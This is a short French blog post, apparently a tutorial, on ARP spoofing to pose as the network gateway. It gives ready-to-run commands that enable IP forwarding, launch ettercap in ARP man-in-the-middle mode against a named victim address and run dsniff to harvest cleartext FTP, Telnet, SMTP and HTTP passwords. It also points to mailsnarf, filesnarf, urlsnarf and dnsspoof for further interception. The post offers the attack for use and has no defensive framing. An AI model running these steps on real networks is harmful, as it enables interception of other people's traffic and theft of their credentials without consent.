Faire de l’ARP spoofing ou ARP poisoning

Il est très simple, sur le même segment réseau, de se faire passer pour la passerelle…

On active l’IP forwarding :

$ sudo sysctl -w net.ipv4.ip_forward=1

On lance ettercap :

$ sudo ettercap -T -M arp /@IP_PASSERELLE/ /@IP_VICTIME/

Enfin on écoute le réseau avec un outil qui nous affichera les mots de passe transitant en clair pour notamment les protocoles FTP, TELNET, SMTP et HTTP!

$ sudo dsniff -mc -n

Avec ettercap (notamment en mode graphique) on peut réaliser des MITM plus sophistiqués! Aussi, on peut uiliser tout un tas d’autres outils sympa : mailsnarf, filesnarf, urlsnarf

Dans un contexte de MITM on peut utiliser dnsspoof! il sera alors possible d’intercepter les requètes dns… et de renvoyer un résultat en fonction de notre propre un fichier host (option -f)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *